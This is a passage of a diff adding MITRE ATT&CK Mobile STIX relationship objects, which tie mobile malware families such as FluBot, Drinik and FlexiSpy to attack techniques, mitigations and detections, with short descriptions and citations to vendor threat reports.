Lookout-Monokle) ", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0f116d99-9ce4-4790-aeda-ad9199d8bf7b", + "created": "2023-02-28T20:31:03.379Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + }, + { + "source_name": "bitdefender_flubot_0524", + "description": "Filip TRUȚĂ, Răzvan GOSA, Adrian Mihai GOZOB. (2022, May 24). New FluBot Campaign Sweeps through Europe Targeting Android and iOS Users Alike. Retrieved February 28, 2023.", + "url": "https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:06:56.734Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can send SMS phishing messages to other contacts on an infected device.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--848581bc-bf8f-40e2-871e-cd67042b4adf", + "created": "2023-01-18T19:14:40.120Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:59:26.448Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can use overlays to steal user banking credentials entered into legitimate sites.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0ce5bf43-39e1-4afb-a939-1984cc2d235c", + "created": "2022-04-01T18:51:44.595Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "System partition integrity mechanisms, such as Verified Boot, can detect the unauthorized modification of system files.", + "modified": "2022-04-01T18:51:44.595Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--de7e3a71-1152-481c-8e5c-88f53852cab6", + "created": "2022-04-01T15:16:53.239Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T15:16:53.239Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a67c5611-00bc-4e1a-a1be-2512a2bcf072", + "type": "relationship", + "created": "2020-09-11T15:14:34.064Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SMS KitKat", + "url": "https://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.html", + "description": "S.Main, D. Braun. (2013, October 14). Getting Your SMS Apps Ready for KitKat. Retrieved September 11, 2020." + } + ], + "modified": "2020-10-22T17:04:15.708Z", + "description": "Users should be encouraged to be very careful with what applications they grant SMS access to. Further, users should not change their default SMS handler to applications they do not recognize.(Citation: SMS KitKat)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--042a4f26-612e-4ed5-b7f3-911a47ec5d71", + "created": "2022-04-18T15:49:00.561Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can download text files with commands from an FTP server and exfiltrate data via email.(Citation: SecureList BusyGasper)", + "modified": "2022-04-18T15:49:00.561Z", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--95fec5e4-d48a-471f-8223-711cd32659b8", + "created": "2022-04-01T18:49:51.050Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T18:49:51.050Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e135cefa-f019-479d-86eb-438972df73e0", + "created": "2019-09-04T15:38:56.702Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FortiGuard-FlexiSpy", + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:48:30.652Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) installs boot hooks into `/system/su.d`.(Citation: FortiGuard-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c9b3d86a-9c5e-4fe3-9c1c-dbd0bb89a74b", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://www.wandera.com/reddrop-malware/", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "source_name": "Wandera-RedDrop" + } + ], + "modified": "2019-10-15T19:27:27.997Z", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) collects and exfiltrates information including IMEI, IMSI, MNC, MCC, nearby Wi-Fi networks, and other device and SIM-related info.(Citation: Wandera-RedDrop)", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c86918a3-6e41-4dfb-8b18-650fff596801", + "type": "relationship", + "created": "2020-09-11T16:22:03.207Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.207Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect device photos, PDF documents, Office documents, browser history, and browser bookmarks.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--adc9957c-fa57-4e81-9231-b60f01b69859", + "type": "relationship", + "created": "2020-12-24T22:04:28.010Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:28.010Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) can download new code to update itself.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2e826926-fd5b-407c-adbc-e998058728d3", + "type": "relationship", + "created": "2019-09-04T15:38:56.786Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019." + } + ], + "modified": "2019-09-10T14:59:26.139Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can record both incoming and outgoing phone calls, as well as microphone audio.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2e59d381-eac6-41c6-a5e6-f9617c10259e", + "type": "relationship", + "created": "2020-06-02T14:32:31.888Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.888Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) obfuscates various pieces of information within the application.(Citation: Volexity Insomnia) ", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1d027925-7d63-459c-b5a5-48ffb49ba1de", + "created": "2023-03-20T15:57:00.953Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:57:00.953Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a28b2f2-ca0e-4d9f-9840-26e8ce944012", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a", + "target_ref": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ce6c7f21-91a5-4d63-bd03-a6b57e025afe", + "created": "2017-10-25T14:48:53.746Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "A locked bootloader could prevent unauthorized modifications to protected operating system files. ", + "modified": "2022-03-30T20:07:33.678Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "target_ref": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5d37400f-80f9-4500-9357-185650e5a7b2", + "created": "2023-02-06T18:54:13.573Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:14:02.866Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can use HTTP to communicate with the C2 server.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0569a1e0-1eb5-4e87-ae09-b698571012ef", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:22:32.033Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to gather SMS messages.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--825ffecc-090f-44c8-87be-f7b72e07f987", + "created": "2022-04-01T18:43:15.716Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security software can typically detect if a device has been rooted or jailbroken and can inform the user, who can then take appropriate action.", + "modified": "2022-04-01T18:43:15.716Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9c302eb1-1810-48a5-b34d-6aae303d2097", + "created": "2022-04-01T15:16:26.387Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be instructed to not open links in applications they don’t recognize.", + "modified": "2022-04-01T15:16:26.387Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e8768455-4d0c-4e3c-a901-1fc871227745", + "created": "2022-03-30T17:54:56.603Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T17:54:56.603Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--786f488c-cb1f-4602-89c5-86d982ee326b", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4920a041-86f7-495b-896c-4d964950ed7e", + "type": "relationship", + "created": "2020-12-17T20:15:22.454Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.454Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) has contained native libraries.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--25de6cf6-38d5-4d1e-b3f1-6956a0ff0ac3", + "created": "2023-03-03T16:26:48.531Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:26:48.531Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has collected compromised device MAC addresses.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3abcd7f4-5f6d-4b5d-9b37-eee68751dcbd", + "created": "2022-04-01T15:02:43.475Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T15:02:43.475Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a2803d73-f5bf-4815-bfbf-662c372e1f5a", + "created": "2023-03-20T18:53:52.174Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:53:52.174Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fb587f81-1300-438d-a33b-f8d08530788b", + "created": "2019-07-10T15:35:43.704Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:41:13.182Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) exfiltrates data using HTTP.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a808c887-b2b8-4b05-9cab-47c918e48d48", + "type": "relationship", + "created": "2020-12-14T15:02:35.257Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-14T15:02:35.257Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can send SMS messages from compromised devices.(Citation: Securelist Asacub) ", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e245e45a-71a8-408d-8f32-7b7337bffc26", + "created": "2023-01-18T19:19:58.007Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:10:23.208Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can hide its application icon.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bb83ee25-8875-4806-9f69-ac39bf7cb402", + "created": "2021-10-01T14:42:49.178Z", + "created_by_ref": 